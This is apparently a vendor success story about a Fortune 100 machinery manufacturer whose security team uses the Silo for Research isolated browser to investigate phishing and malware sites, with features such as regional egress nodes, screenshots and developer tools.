American equipment manufacturer relies on Silo for Research to analyze threats

A Fortune 100 machinery manufacturer doesn’t take any chances with malware and phishing threats. The company’s detection and mitigation team responds to system alerts and phishing exposure reports, and uses Silo for Research to identify and analyze potential threats, plus coordinate appropriate actions and communications to mitigate risk.
SHARE ON:
Equipment manufacturer success story

DIY “dirty” network not sufficient for SOC, advanced threat hunting

Our customer is among the world’s largest manufacturers of equipment and heavy machinery, serving clients on every continent. The company’s security team relies on an integrated set of tools to trigger alerts when suspected malware enters the network, followed by a coordinated effort of a dedicated team of threat hunters to determine the nature of the threat, its origins and appropriate mitigation strategies.

When the SOC detection and mitigation team receives a warning that someone might have accidentally downloaded a suspicious file or been exposed to a phishing email, they start by running automated tests against suspicious site’s elements and services. The results may help explain where the malware came from and how it was executed, but the scanner information alone is not sufficient to determine the true intentions of the site’s owners.

To dig deeper, security analysts would use a homegrown “dirty” network to access the site and look around. And while a dedicated connection provided a barrier between the investigators’ activities and the corporate network, the DIY “dirty” network didn’t have the features needed to conduct a thorough examination and required continuous monitoring and maintenance.

What’s more, once the company switched to remote work during the COVID-19 pandemic, investigators lost their dedicated connection, halting their ability to follow up on threats beyond initial analysis and making it outright dangerous to investigate malicious sites for fear of introducing malware to the company’s core network.

The DIY “dirty” network didn’t have the features needed to conduct a thorough examination and required continuous monitoring and maintenance.

-

Silo For Research fits into SOC workflow, provides actionable results

Silo for Research provides a platform for isolated browsing, accessible from anywhere, without the need for a “dirty” network. The detection and mitigation team has incorporated the use of Silo for Research into their daily workflow, relying on its many features, such as screenshot capture and shared storage, to research threats and recommend preventative measures.

The solution allows investigators to interact with all types of content safely on the cloud, protecting company’s assets and keeping researchers’ actions secure and anonymous. With Silo for Research, investigators can safely dig deep inside any site to look for hidden features, such as redirects to other locations.

 

Analysts appear as in-region visitors to avoid geo-blocking

As a global company, the manufacturer needs to be able to research threats that originate in different parts of the world. Silo for Research offers a full array of translation features, as well as the ability for investigators to customize their location, time zone and keyboard settings, to appear to be connecting from anywhere in the world. The company’s detection and mitigation team used Silo’s different egress nodes to investigate threats that are designed to target certain geographies — like the Russian-origin malware specifically aimed at the users in the U.K. Silo also proved valuable when performing penetration testing to evaluate the security of the company’s own web-based systems around the world.

 

Storage, capture and dev tools built for the job

When the automated ticketing system receives an alert of potential phishing exposure and flags it for further investigation, the detection and mitigation team immediately opens the suspicious site within Silo for Research and uses developer tools to look into the HTML code that’s responsible for credential harvesting.

The goal is to find where the stolen information is going, so they can update the list of blocked sites to prevent them from launching phishing campaigns in the future.

Similarly, when investigating malware reports, researchers can access malicious sites within Silo for Research and safely download suspicious files, even if they have already been deleted from the machine of a user who stumbled upon that malware first.

All evidence and other items of interest are documented as screenshots and attached to the service ticket, which are subsequently reviewed by the team of intelligence analysts, who determine which URLs must be blocked to keep the company’s networks safe.

Silo for Research offers a full array of translation features, as well as the ability for investigators to customize their location, time zone and keyboard settings, to appear to be connecting from anywhere in the world.

-

Related Success Stories

success-story
success story

Location, Location, Location: Helping SOC Investigate Region-Specific Malware

Location, Location, Location: Silo for Research Helps SOC Investigate Region-Specific Malware Phishing attacks powered by region-specific malware plagued a large manufacturer. Their SOC turned to Silo for Research due to its regional egress nodes to bypass access blocks, giving threat hunters…

Read more
success-story
success story

City Government Investigates Threats, Collaborates with Other Agencies

City Government Investigates Threats, Collaborates to Respond to Criminal Activity The SOC team of a major U.S. city government conducts complete, detailed investigations, collecting evidence to share with site owners and even law enforcement agencies with the help of Silo for Research…

Read more
Close
Close